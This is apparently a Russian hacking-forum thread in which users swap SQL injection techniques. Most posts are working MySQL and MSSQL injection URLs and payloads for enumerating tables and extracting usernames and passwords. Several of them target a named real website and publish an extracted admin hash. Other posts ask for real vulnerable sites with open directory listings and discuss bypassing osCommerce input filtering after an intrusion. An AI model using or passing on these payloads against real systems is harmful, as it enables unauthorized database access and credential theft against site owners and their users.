Узвимости директорий сервера Такой вопрос: если ли какие-нибудь реальные сайты, у которых уязвимость листинга директорий и возможность загрузки файла в эти каталоги. Нужен реальный пример. Спасибо за помощь.
Такой интересный вопросег: Вот скуль Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+--+ version() user() database() не проходит...ну думаю и ладно...наугад проверил..5ая ветка..нашол таблу nuke_users в ней поля username, user_password пытаюсь открыть..ошибка,мысля...табла не в той базе..нашол базу.. Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_schema,4,5,6,7+from+information_schema.%20tables+where+table_name=0x6E756B655F7573657273%20-- edward_swing_s при запросе Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+from+edward_swing_s.nuke_users+--+ тоже ошибка....в чём трабла,мож гдето в синькасисе ошибся...подскажите
Фильтруются скобки.. Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,@@version,4,5,6,7-- Таблица nuke_users - пустая. Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_rows,4,5,6,7+from+information_schema.tables+where+table_name=0x6E756B655F7573657273-- Да и вообще, админские юзеры хранятся тут: Code: http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,aid,4,5,6,7+from+nuke_authors-- 5a4be1fa34e62bb8a6ec6b91d2462f5a:5153
Как SIPT-ом слать POST запросы ? Я поменял В поле Request Type GET на POST,и стал слать запросы.В итоге,в логах апача они отображаются: 127.0.0.1 - - [06/Feb/2009:12:26:47 +0200] "POST /'%20%20AND%201=1/* HTTP/1.1" 404 138 "-" "Microsoft URL Control - 6.01.9782" Отсюда два вариант: Это либо пост,либо кривой гет )) )
Приветсвую всех! Возникли вопросы по MS SQL Injection (в mysql inj вроде более менее понимаю) Итак, начнем 1.Нашел я значит ошибку в БД, выдало мне Сделал я запрос order+by и насчитал аж 100 колонок Теперь как же мне посмотреть версию БД, узнать таблицы и посмотреть что в них? ЧТо то по статьям не могу догнать (прочитал пока только одну, читаю вторую)) Спасибо за ответы заранее, + поставлю обязательно!
версия - 1 or 1=@@version-- таблици - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('имя таблици'))--
Сейчас делаю запрос: example.ru/index.asp?id=1'+union+select+table_name+from+information_schema.tables-- Выдает название первой таблицы, делаю с лимитом: example.ru/index.asp?id=1'+union+select+table_name+from+information_schema.tables+limit+1,1-- Выдает: Line 1: Incorrect syntax near '1'. Как победить?
$p01nt Победить лучше прочтением статьи по MSSQL. Там другой синтаксис. Подойдёт любая, можешь почитать эту : https://forum.antichat.ru/thread30501.html
Люди,вот такая проблема: Проник в систему,нашёл двиг,на котором крутится сайтец. Вот функция движная,двиг не определил: Code: function tep_db_prepare_input($string) { if (is_string($string)) { return trim(stripslashes($string)); } elseif (is_array($string)) { reset($string); while (list($key, $value) = each($string)) { $string[$key] = tep_db_prepare_input($value); } return $string; } else { return $string; } } Она удаляет пробелы и обратные слэши,если это строка,а если это массив,то делает то же самое и для каждого элемента массива.Если это НИ то и НИ другое,то не делает НИЧЕГО,т.е. получается,что фильтрацию мы обошли(и саму функцию частично).Передаю такое: 1+order+by+1 без кавычек.Она мне выдаёт на выходе 2.Почему ? Я так понял,что он определил это как строку,но тогда почему она выполнила такое преобразование ? Пробелов-то нет,и слэшей обратных тем более.Помогите пожалуйста =_= ЗЫ: Если передать строку в одинарных или в двойных кавычках,то тогда работает третий блок кода,но я сомневаюсь,что сервер позволит мне так играть(из-за magic_quots_gpc.Пока не проверил,но уверен,что включена). Так... Походу,это osCommerce, Open Source E-Commerce Solutions.Не заметил я что-то ))) http://www.oscommerce.com/ Ухх,убить бы этот сайт нафиг...
$p01nt, как сказал jokester, там отличается синтаксис... Ты заюзал синтаксис mysql, а для MSSQL нужно по другому: www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- Узнаем название первой таблици... Для того, чтоб узнать название следующей, нажно составить запрос вида: www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('имя полученой таблици'))-- чтоб следующую : www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('имя первой таблици','имя второй таблици'))-- и так далее... Аналогично и с колонками.
2-m0rgan-, ага, я уже разобрался по статье Еще раз я, как мне перебрать все данные в колонке если нет поля ID и т.п. Т.е. есть только поля: USERNAME,USERPASSWORD Запрос выглядит след. образом: 1+or+1=(SELECT+TOP+1+USERNAME+from+DD_Users)-- Напоминаю, я говорю про mssql inj
$p01nt, http://www.site.ru/index.php?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(USERPASSWORD+as+ nvarchar)+from+DD_Users)-- Это выведит даные из USERNAME и USERPASSWORD А на счет перебора, я хз...возможно там только один юзер...
Сформировал запрос под свой url: +or+1=(select Email from EmailTable where Email not in (select top 2 Email from EmailTable))-- выдает: Microsoft OLE DB Provider for SQL Server error '80004005' Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression. /xxx/xxx.asp, line 156
